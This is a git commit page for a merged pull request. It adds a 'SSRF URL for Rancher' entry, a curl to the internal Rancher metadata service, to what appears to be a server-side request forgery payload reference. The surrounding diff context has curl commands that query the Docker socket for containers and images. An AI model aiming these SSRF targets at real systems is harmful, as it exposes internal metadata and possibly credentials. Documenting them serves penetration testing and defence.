Merge pull request #26 from Techbrunch/patch-1

Add Rancher Metadata Service
This commit is contained in:
Swissky 2018-10-08 23:02:35 +02:00 committed by GitHub
commit ea1c3a7ccb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/<version>/<path>
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
## Thanks to